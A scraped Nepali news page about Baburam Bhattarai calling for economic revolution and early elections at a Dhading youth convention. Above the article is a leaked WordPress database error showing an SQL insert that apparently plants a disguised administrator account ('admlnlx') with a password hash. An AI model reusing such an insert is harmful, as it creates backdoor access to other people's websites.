WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1kcjQBDs63NdEeJHbpImWzQaBfnbU/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 21:58:02', '', 'admlnlx', 'admlnlx')
धादिङ, माघ ११–
नयाँ शक्ति नेपालका संयोजक डा.बाबुराम भट्टराईले राजनीतिक क्रान्तिको सफलतापछि देशमा सङ्घीय लोकतान्त्रिक गणतन्त्र नेपालको संविधान जारी भइसकेको अवस्थामा अब आर्थिक क्रान्तिको आवश्यकता रहेको बताउनुभएको छ ।
राष्ट्रिय युवा अभियान धादिङको प्रथम जिल्ला अधिवेशको आज यहाँ उद्घाटन गर्दै उहाँले राजनीतिक क्रान्ति सकिए पनि स्थिरता प्राप्त भइनसकेकाले मधेसवादी दलहरुको जायज मागलाई सम्बोधन गर्ने गरी संविधान संशोधन गरेर २०७४ माघ ७ गतेभित्र तीनवटै निर्वाचन हुनुपर्ने बताउनुभयो ।
राजनीतिक स्थिरताका लागि कार्यकारी राष्ट्रपतिको प्रत्यक्ष निर्वाचन र पूर्ण समानुपातिक संसद्को निर्वाचन हुुनु आवश्यक रहेको उहाँको भनाइ थियो ।
युवा अभियानका जिल्ला संयोजक टीकाराम तामाङको अध्यक्षतामा सम्पन्न कार्यक्रममा सो पार्टीका सल्लाहकार योगी विकाशानन्द, प्रशिक्षण विभागका प्रमुख डम्बर खतिवडा, शिक्षण विभागका प्रमुख डा राजेन्द्र केसी, महिला विभागका प्रमुख एवम् पूर्वमन्त्री कल्पना धमलाले पनि आ–आफ्नो धारणा राखेका थिए ।